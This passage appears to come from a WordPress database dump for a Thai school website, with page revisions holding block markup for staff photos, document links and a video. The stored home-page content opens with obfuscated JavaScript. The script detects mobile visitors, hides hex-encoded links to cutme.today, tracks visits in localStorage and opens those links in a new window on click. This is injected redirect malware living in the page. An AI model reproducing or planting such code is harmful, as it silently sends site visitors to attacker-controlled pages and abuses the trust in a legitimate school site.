os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 11:21:11','2024-09-24 04:21:11','',19,'http://watprato.ssk.in.th/?p=421',0,'revision','',0),
(422,2,'2024-09-24 11:21:46','2024-09-24 04:21:46','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"full\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:image {\"id\":418,\"width\":\"566px\",\"height\":\"auto\",\"sizeSlug\":\"large\",\"linkDestination\":\"none\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-large is-resized is-style-default\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03-1024x346.jpg\" alt=\"\" class=\"wp-image-418\" style=\"width:566px;height:auto\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 